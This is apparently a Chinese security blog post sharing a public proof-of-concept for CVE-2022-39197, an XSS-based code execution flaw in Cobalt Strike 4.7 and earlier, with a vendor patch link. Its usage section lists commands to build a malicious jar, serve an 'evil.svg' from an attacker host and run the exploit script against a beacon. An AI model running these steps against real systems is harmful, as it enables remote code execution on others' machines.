【CVE-2022-39197】CobaltStrike RCE POC

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/its-arun/CVE-2022-39197

漏洞相关资料

HelpSystems Cobalt Strike 跨站脚本漏洞

HelpSystems Cobalt Strike是美国HelpSystems公司的一个渗透测试软件。

HelpSystems Cobalt Strike 4.7及之前版本存在跨站脚本漏洞,该漏洞源于XSS(跨站脚本)漏洞,允许远程攻击者在Cobalt Strike团队服务器上执行HTML。

 

修复方法

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://www.cobaltstrike.com/blog/out-of-band-update-cobalt-strike-4-7-1/

 

用法

  • 准备有效载荷
  1. 编辑 Line 19与您的有效载荷 EvilJar/src/main/java/Exploit.java
  2. 使用 jar 构建 mvn clean compile assembly:single
  3. 移动 EvilJar-1.0-jar-with-dependencies.jarEvilJar/target/serve/文件夹
  4. 编辑 serve\evil.svg代替 [attacker]
  5. 使用 python3 -m http.server 8080
  • 执行漏洞利用
    python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg

一旦用户滚动进程列表,有效负载将被触发

POC.JPG?

f3ccdd27d2144854

 

参考链接

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg—— 对这个漏洞进行了深入的分析 https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html

标签:工具分享, 漏洞分享, POC脚本, cobaltstrike系列